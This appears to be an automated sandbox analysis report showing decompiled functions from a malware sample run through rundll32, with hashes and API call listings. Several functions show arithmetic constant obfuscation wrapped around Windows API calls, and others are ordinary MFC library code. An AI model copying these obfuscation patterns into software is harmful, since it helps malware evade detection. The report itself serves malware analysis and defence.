Opcode ID: b4851fbc967e80632ceaae16085051e2ffb8b9a716274a9c9d1963887c1b1d72
Instruction ID: 59fce647b509f96afedaaf5052f810ceff91ac9638c41baf0393a9b783b9727a
Opcode Fuzzy Hash: b4851fbc967e80632ceaae16085051e2ffb8b9a716274a9c9d1963887c1b1d72
Instruction Fuzzy Hash: D6E01A70694755AEEB02AB304C8571636E8EB446C7F138829F515CE0B1EF70D684D611

Uniqueness

Uniqueness Score: -1.00%

Function 00C3602C Relevance: 1.6, APIs: 1, Instructions: 66
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00C3602C(long __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, long _a20, WCHAR* _a24, intOrPtr _a28, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t42;
				void* _t50;
				signed int _t53;
				long _t57;
				long _t58;

				_t58 = __edx;
				_push(0);
				_push(_a36);
				_t57 = __ecx;
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00C332C4(_t42);
				_v32 = 0xf2bcc;
				_v28 = 0x9963f;
				_v24 = 0;
				_v20 = 0;
				_v12 = 0x481e97;
				_v12 = _v12 + 0x3bb9;
				_v12 = _v12 | 0xe5ca697e;
				_v12 = _v12 ^ 0xe5cf84b6;
				_v8 = 0xca7b5c;
				_t53 = 0x38;
				_v8 = _v8 / _t53;
				_v8 = _v8 >> 6;
				_v8 = _v8 ^ 0x0004807b;
				_v16 = 0xf3cd85;
				_v16 = _v16 ^ 0x0b7576d7;
				_v16 = _v16 ^ 0x0b87a2f8;
				E00C252F2(_t53, _v8 % _t53, _t53, 0xf4, 0xbdcc8d36, 0x9f49d153);
				_t50 = CreateFileW(_a24, _a20, _a12, 0, _t57, _t58, 0); // executed
				return _t50;
			}

0x00c36037
0x00c36039
0x00c3603a
0x00c3603d
0x00c3603f
0x00c36040
0x00c36043
0x00c36046
0x00c36049
0x00c3604c
0x00c3604f
0x00c36052
0x00c36055
0x00c36056
0x00c36057
0x00c3605c
0x00c36066
0x00c3606f
0x00c36072
0x00c36075
0x00c3607c
0x00c36083
0x00c3608a
0x00c36091
0x00c3609d
0x00c360a5
0x00c360a8
0x00c360ac
0x00c360b3
0x00c360ba
0x00c360c1
0x00c360dc
0x00c360f1
0x00c360f9

APIs

CreateFileW.KERNEL32(000F2BCC,0009963F,911404DD,00000000,?,00000000,00000000), ref: 00C360F1

Memory Dump Source

Source File: 00000003.00000002.406684150.0000000000C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000003.00000002.406640645.0000000000C20000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.406712811.0000000000C42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c20000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6d1239d744402909eaf6f0c2dda43dfc09e7586af067e989eca2d59162b3ddb8
Instruction ID: 872b30c11ea30fe917a78781626b913db30b693bb945f8fe2210b4e4f1a088f9
Opcode Fuzzy Hash: 6d1239d744402909eaf6f0c2dda43dfc09e7586af067e989eca2d59162b3ddb8
Instruction Fuzzy Hash: 4121F57290020DBFDF05DF95DC858AFBFB9EB44354F108498FA14A6220D7768A65AB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C28B6C Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00C28B6C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t29;
				int _t35;
				void* _t38;

				_push(_a8);
				_t38 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00C332C4(_t29);
				_v20 = 0x5d7bf;
				_v16 = 0x99716;
				_v16 = 0xe29eb1;
				_v16 = _v16 ^ 0x3393c2ed;
				_v16 = _v16 ^ 0x337b9675;
				_v8 = 0xbc32bf;
				_v8 = _v8 + 0xffff25e6;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0xde5dd6d8;
				_v8 = _v8 ^ 0xde59c7e5;
				_v12 = 0xe3d251;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0x08a6b2c4;
				_v12 = _v12 ^ 0x08adb9ba;
				E00C252F2(__ecx, __edx, __ecx, 0x34, 0x2b7f8c29, 0x9f49d153);
				_t35 = FindCloseChangeNotification(_t38); // executed
				return _t35;
			}

0x00c28b73
0x00c28b76
0x00c28b78
0x00c28b7b
0x00c28b7c
0x00c28b7d
0x00c28b82
0x00c28b8c
0x00c28b93
0x00c28b9a
0x00c28ba1
0x00c28ba8
0x00c28baf
0x00c28bb6
0x00c28bba
0x00c28bc1
0x00c28bc8
0x00c28bcf
0x00c28bd3
0x00c28bda
0x00c28bf7
0x00c28c00
0x00c28c06

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00C28C00

Memory Dump Source

Source File: 00000003.00000002.406684150.0000000000C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000003.00000002.406640645.0000000000C20000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.406712811.0000000000C42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c20000_rundll32.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: d6461675db5e5e1fdae447af73487a38bc4d14b904fac464a7ebfd6aadb21cc1
Instruction ID: 7f423c0fbd7c4ed51c26cacd7b5fe93e56734956d8c59750b851b3e9eb499b8a
Opcode Fuzzy Hash: d6461675db5e5e1fdae447af73487a38bc4d14b904fac464a7ebfd6aadb21cc1
Instruction Fuzzy Hash: 2D011775C0521CFBDB14EFA8894A88EBBB4EF00314F108489E825B7251D7768B14DF90

Uniqueness

Uniqueness Score: -1.00%

Function 100285E7 Relevance: 1.5, APIs: 1, Instructions: 39
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E100285E7(intOrPtr* __ecx) {
				intOrPtr _t12;
				intOrPtr _t14;
				signed char* _t15;
				long* _t17;
				long* _t19;
				intOrPtr _t23;
				intOrPtr* _t26;
				void* _t28;

				E10011A8C(E1002A9FC, _t28);
				_push(__ecx);
				_t26 = __ecx;
				if( *__ecx == 0) {
					_t20 =  *0x10039e40; // 0x10039e44
					if(_t20 == 0) {
						 *((intOrPtr*)(_t28 - 0x10)) = 0x10039e44;
						 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
						_t15 = E10028420(0x10039e44);
						 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
						_t20 = _t15;
						 *0x10039e40 = _t15; // executed
					}
					_t14 = E100281D9(_t20); // executed
					 *_t26 = _t14;
				}
				_t17 =  *0x10039e40; // 0x10039e44
				_t23 = E100282E5(_t17,  *_t26);
				if(_t23 == 0) {
					_t12 =  *((intOrPtr*)(_t28 + 8))();
					_t19 =  *0x10039e40; // 0x10039e44
					_t23 = _t12;
					E100284C5(_t19,  *_t26, _t23);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return _t23;
			}

APIs

__EH_prolog.LIBCMT ref: 100285EC

Part of subcall function 10028420: TlsAlloc.KERNEL32(?,10028616,00000000,?,?,10027756,100272A4,10027772,1001E169,10006E4C,?,10006E8A,8007000E,10006F40), ref: 10028442

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocH_prolog
String ID:
API String ID: 3910492588-0
Opcode ID: e7b0fb009e732440d7f1ad1dadbdc5c11312b5a2a351de4b687d320f66e89e2b
Instruction ID: 2d4efd59785827692598295cd274691eeff327a1802b919cb3bc61650911ffe3
Opcode Fuzzy Hash: e7b0fb009e732440d7f1ad1dadbdc5c11312b5a2a351de4b687d320f66e89e2b
Instruction Fuzzy Hash: E701AD39601141DFD72ADF65E80176D76A2FB84252F50012DF8818B391DF749E00CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00C408C3 Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C408C3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t32;
				void* _t33;

				_v20 = 0xba35d;
				_v16 = 0x2c63f;
				_v8 = 0x18668b;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x77;
				_v8 = _v8 + 0xffff88d8;
				_v8 = _v8 ^ 0xabd92865;
				_v12 = 0xa923ab;
				_v12 = _v12 + 0xffffe870;
				_v12 = _v12 ^ 0x2e66d6cd;
				_v12 = _v12 ^ 0x2eca4b61;
				_v16 = 0xa7f2df;
				_v16 = _v16 + 0xffff74c1;
				_v16 = _v16 ^ 0x00a03459;
				E00C252F2(_t32, _t33, _t32, 0xc1, 0x82522eb8, 0x9f49d153);
				ExitProcess(0);
			}

0x00c408c9
0x00c408d0
0x00c408d7
0x00c408de
0x00c408f6
0x00c408f9
0x00c40900
0x00c40907
0x00c4090e
0x00c40915
0x00c4091c
0x00c40923
0x00c4092a
0x00c40931
0x00c40941
0x00c4094b

APIs

ExitProcess.KERNEL32(00000000), ref: 00C4094B

Memory Dump Source

Source File: 00000003.00000002.406684150.0000000000C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000003.00000002.406640645.0000000000C20000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.406712811.0000000000C42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c20000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 1d89245fcaf8bc8bfc49024291ef06cfa865d6d529eb9dfc713b0c2537c2a249
Instruction ID: 50102edea923cb1395e9731ab02976953a9b7ed9880f3c563283a167ca5a24bb
Opcode Fuzzy Hash: 1d89245fcaf8bc8bfc49024291ef06cfa865d6d529eb9dfc713b0c2537c2a249
Instruction Fuzzy Hash: AB0100B1D4130CFBDB44DFE9E98A98EBBB0EB10714F208189A824B7290D3B84B549F44

Uniqueness

Uniqueness Score: -1.00%

Function 10003EB0 Relevance: 1.3, APIs: 1, Instructions: 10
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003EB0(void* _a4, long _a8, long _a12, long _a16) {
				void* _t7;

				_t7 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t7;
			}

0x10003ec4
0x10003eca

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 10003EC4

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 15b89824363f171e64d021769587ec405e143ae0d2096a53b22888187e350f18
Instruction ID: cc11b4e98ac1f6dbf9c6c41e4826b94b26534509fc882ebdeb3bfc844180388a
Opcode Fuzzy Hash: 15b89824363f171e64d021769587ec405e143ae0d2096a53b22888187e350f18
Instruction Fuzzy Hash: 49C002B9608301BFDA04CB54C898D6BB7EDEBC8340F00894CF699C3210C770E841CB62

Uniqueness

Uniqueness Score: -1.00%

Function 10003ED0 Relevance: 1.3, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003ED0(void* _a4, long _a8, long _a12) {
				int _t5;

				_t5 = VirtualFree(_a4, _a8, _a12); // executed
				return _t5;
			}

0x10003edf
0x10003ee5

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 10003EDF

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4a008d87dccae8804d9abd27eac3f0a4c8d83060a253e3a0d4fa13a2ed21b652
Instruction ID: 0814384d662f6d192d51ff160704c728768ee215607d74ccaf3f6caab97fdcf1
Opcode Fuzzy Hash: 4a008d87dccae8804d9abd27eac3f0a4c8d83060a253e3a0d4fa13a2ed21b652
Instruction Fuzzy Hash: 6EC048B8208300BFEA04CB10C989C2BB7A9EBC8610F00C94CB88A83210C630EC01DB22

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10023806 Relevance: 15.1, APIs: 10, Instructions: 102
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10023806(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t33;
				long _t35;
				intOrPtr* _t36;
				void* _t43;
				void* _t49;
				CHAR* _t69;
				void* _t74;
				void* _t76;

				E10011A8C(E1002AA23, _t76);
				_t33 =  *0x100371f4; // 0x82d1d2ba
				_t69 =  *(_t76 + 8);
				 *((intOrPtr*)(_t76 - 0x10)) = _t33;
				_t35 = GetFullPathNameA( *(_t76 + 0xc), 0x104, _t69, _t76 - 0x154);
				if(_t35 != 0) {
					if(_t35 < 0x104) {
						_t36 = E1002320B();
						_t67 =  *_t36;
						 *(_t76 + 8) =  *((intOrPtr*)( *_t36 + 0xc))() + 0x10;
						 *((intOrPtr*)(_t76 - 4)) = 0;
						E100237C4(_t69, _t76 + 8);
						if(PathIsUNCA( *(_t76 + 8)) != 0) {
							L15:
							_t74 = 1;
						} else {
							if(GetVolumeInformationA( *(_t76 + 8), 0, 0, 0, _t76 - 0x15c, _t76 - 0x158, 0, 0) != 0) {
								if(( *(_t76 - 0x158) & 0x00000002) == 0) {
									CharUpperA(_t69);
								}
								if(( *(_t76 - 0x158) & 0x00000004) != 0) {
									goto L15;
								} else {
									_t49 = FindFirstFileA( *(_t76 + 0xc), _t76 - 0x150);
									if(_t49 == 0xffffffff) {
										goto L15;
									} else {
										FindClose(_t49);
										if( *(_t76 - 0x154) == 0 ||  *(_t76 - 0x154) <= _t69 || lstrlenA(_t76 - 0x124) - _t69 +  *(_t76 - 0x154) >= 0x104) {
											goto L6;
										} else {
											lstrcpyA( *(_t76 - 0x154), _t76 - 0x124);
											goto L15;
										}
									}
								}
							} else {
								L6:
								_t74 = 0;
							}
						}
						E10002EB0( &(( *(_t76 + 8))[0xfffffffffffffff0]), _t67);
						_t43 = _t74;
					} else {
						goto L3;
					}
				} else {
					lstrcpynA(_t69,  *(_t76 + 0xc), 0x104);
					L3:
					_t43 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return E10011A49(_t43,  *((intOrPtr*)(_t76 - 0x10)));
			}

APIs

__EH_prolog.LIBCMT ref: 1002380B
GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,?), ref: 10023835
lstrcpynA.KERNEL32(?,?,00000104,?,?,?), ref: 10023846

Part of subcall function 100237C4: lstrcpynA.KERNEL32(00000000,?,00000104,?,?,?), ref: 100237E9
Part of subcall function 100237C4: PathStripToRootA.SHLWAPI(00000000,?,?,?), ref: 100237F0

PathIsUNCA.SHLWAPI(?,?,?,?,?,?), ref: 1002387B
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?,?), ref: 1002389F
CharUpperA.USER32(?,?,?,?), ref: 100238B7
FindFirstFileA.KERNEL32(?,?,?,?,?), ref: 100238D0
FindClose.KERNEL32(00000000,?,?,?), ref: 100238DC
lstrlenA.KERNEL32(?,?,?,?), ref: 100238F9
lstrcpyA.KERNEL32(?,?,?,?,?), ref: 10023918

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
String ID:
API String ID: 4080879615-0
Opcode ID: b77f1ac3978eb44781d7087b33618c1d3dc24f14267587a104814371dcc302d8
Instruction ID: cbeb7a53aca0e18478957e39939a260d566e9066c738e7134cbc6e3d23375465
Opcode Fuzzy Hash: b77f1ac3978eb44781d7087b33618c1d3dc24f14267587a104814371dcc302d8
Instruction Fuzzy Hash: 4831E331900629EFDB11CFA0DC88ADEBBBCEF45355F908166F409EA120CB309E95CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10005B60 Relevance: 9.1, APIs: 6, Instructions: 67
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E10005B60(void* __ecx) {
				int _v84;
				char _v88;
				struct tagRECT _v104;
				void* __esi;
				int _t15;
				int _t19;
				int _t20;
				void* _t55;

				_t55 = __ecx;
				_t15 = IsIconic( *(__ecx + 0x1c));
				_t57 = _t15;
				if(_t15 == 0) {
					return E1001EBC6(_t55, _t55, __eflags);
				} else {
					_push(_t55);
					E10024FA0( &_v84, _t57);
					SendMessageA( *(_t55 + 0x1c), 0x27, _v84, 0);
					_t19 = GetSystemMetrics(0xb);
					_t20 = GetSystemMetrics(0xc);
					GetClientRect( *(_t55 + 0x1c),  &_v104);
					asm("cdq");
					asm("cdq");
					DrawIcon(_v84, _v104.right - _v104.left - _t19 + 1 - _v104.left >> 1, _v104.bottom - _v104.top - _t20 + 1 -  *(_t55 + 0xa50) >> 1,  *(_t55 + 0xa50));
					return E10024FFB( &_v88);
				}
			}

0x10005b64
0x10005b6a
0x10005b70
0x10005b72
0x10005c0b
0x10005b78
0x10005b7a
0x10005b7f
0x10005b91
0x10005b9f
0x10005ba5
0x10005bb2
0x10005bcc
0x10005bdf
0x10005bea
0x10005bff
0x10005bff

APIs

IsIconic.USER32 ref: 10005B6A

Part of subcall function 10024FA0: __EH_prolog.LIBCMT ref: 10024FA5
Part of subcall function 10024FA0: BeginPaint.USER32(?,?,?,?,1001EBE7), ref: 10024FD3

SendMessageA.USER32(?,00000027,?,00000000), ref: 10005B91
GetSystemMetrics.USER32 ref: 10005B9F
GetSystemMetrics.USER32 ref: 10005BA5
GetClientRect.USER32 ref: 10005BB2
DrawIcon.USER32 ref: 10005BEA

Part of subcall function 10024FFB: __EH_prolog.LIBCMT ref: 10025000
Part of subcall function 10024FFB: EndPaint.USER32(?,?,?,?,1001EC0D,?), ref: 1002501D

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: H_prologMetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
String ID:
API String ID: 1530917984-0
Opcode ID: 0f3b34dff056d5210852d9607477652bce15868df9d995af9a900628968c819f
Instruction ID: 5182488d2048b35cba8559b18d63d6b76633b9c37917e021af1092b9d80c7efe
Opcode Fuzzy Hash: 0f3b34dff056d5210852d9607477652bce15868df9d995af9a900628968c819f
Instruction Fuzzy Hash: 79116AB52047119FD228DF3CDD89E6B77EDEBC8310F554A28F586C3284DA30F90A8A61

Uniqueness

Uniqueness Score: -1.00%

Function 100268C5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
librarystringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E100268C5(void* __esi, intOrPtr _a4, char _a8) {
				intOrPtr _v8;
				char _v284;
				intOrPtr _t10;
				void* _t15;
				void* _t20;

				_t20 = __esi;
				_t10 =  *0x100371f4; // 0x82d1d2ba
				_v8 = _t10;
				if(_a8 != 0x800) {
					if(GetLocaleInfoA(_a8, 3,  &_a8, 4) != 0) {
						goto L2;
					} else {
					}
				} else {
					lstrcpyA( &_a8, "LOC");
					L2:
					_push(_t20);
					_t15 = E100119C1( &_v284, 0x112, _a4,  &_a8);
					if(_t15 == 0xffffffff || _t15 >= 0x112) {
						_t12 = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
				}
				return E10011A49(_t12, _v8);
			}

APIs

lstrcpyA.KERNEL32(00000800,LOC), ref: 100268E8
LoadLibraryA.KERNEL32(?), ref: 1002691B
GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 1002692B

Strings

LOC, xrefs: 100268E2

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: InfoLibraryLoadLocalelstrcpy
String ID: LOC
API String ID: 864663389-519433814
Opcode ID: 13666489dbc6076c2ecfb5badc28e9646f7442118de2c7f77aed264709aefa04
Instruction ID: dd3d41542b16ba1cdf5d3771843f0e70b9dc9993811390860c1d518de318e0b2
Opcode Fuzzy Hash: 13666489dbc6076c2ecfb5badc28e9646f7442118de2c7f77aed264709aefa04
Instruction Fuzzy Hash: 3A018671900218FBDF25DF60DC49ADE37ACEB08324F908561FD15D6190EB70DB999B90

Uniqueness

Uniqueness Score: -1.00%

Function 10020E85 Relevance: 6.0, APIs: 4, Instructions: 41
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E10020E85(void* __ecx) {
				signed int _t5;
				void* _t15;
				void* _t19;

				_t15 = __ecx;
				if((E100229FB(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E100209E9(_t15);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E10006E47();
				if(_t19 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x1c), 0x111, 0xe146, 0);
					return 1;
				}
			}

0x10020e88
0x10020e94
0x10020edc
0x10020ede
0x10020ee5
0x00000000
0x10020ee7
0x10020e9b
0x10020e9f
0x00000000
0x10020ec2
0x10020ed1
0x00000000
0x10020ed9

APIs

Part of subcall function 100229FB: GetWindowLongA.USER32 ref: 10022A06

GetKeyState.USER32(00000010), ref: 10020EA9
GetKeyState.USER32(00000011), ref: 10020EB2
GetKeyState.USER32(00000012), ref: 10020EBB
SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 10020ED1

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: d29282d662411b5af618882cce8efd776785956748525f7b0cfa37e9851764a6
Instruction ID: bd9e3f9934d99040cc27c92473149591056999e02df00b6ccec2108507d898b5
Opcode Fuzzy Hash: d29282d662411b5af618882cce8efd776785956748525f7b0cfa37e9851764a6
Instruction Fuzzy Hash: B8F0E93A78039F2DEE10F675AC42FAA045ACF44BD0F930935F641FA4D3C950D8425170

Uniqueness

Uniqueness Score: -1.00%

Function 10028915 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10028915(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}

0x10028922
0x1002892b
0x10028934
0x1002893e
0x10028948
0x10028952
0x1002895c
0x10028966
0x10028970
0x1002897a
0x10028984
0x1002898e
0x10028993
0x1002899a

APIs

RegisterClipboardFormatA.USER32 ref: 10028924
RegisterClipboardFormatA.USER32 ref: 1002892D
RegisterClipboardFormatA.USER32 ref: 10028937
RegisterClipboardFormatA.USER32 ref: 10028941
RegisterClipboardFormatA.USER32 ref: 1002894B
RegisterClipboardFormatA.USER32 ref: 10028955
RegisterClipboardFormatA.USER32 ref: 1002895F
RegisterClipboardFormatA.USER32 ref: 10028969
RegisterClipboardFormatA.USER32 ref: 10028973
RegisterClipboardFormatA.USER32 ref: 1002897D
RegisterClipboardFormatA.USER32 ref: 10028987
RegisterClipboardFormatA.USER32 ref: 10028991

Strings

ObjectLink, xrefs: 1002892F
OwnerLink, xrefs: 10028926
Embedded Object, xrefs: 10028939
Link Source, xrefs: 1002894D
Embed Source, xrefs: 10028943
Native, xrefs: 1002891D
RichEdit Text and Objects, xrefs: 10028989
FileNameW, xrefs: 10028975
Object Descriptor, xrefs: 10028957
FileName, xrefs: 1002896B
Link Source Descriptor, xrefs: 10028961
Rich Text Format, xrefs: 1002897F

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ClipboardFormatRegister
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
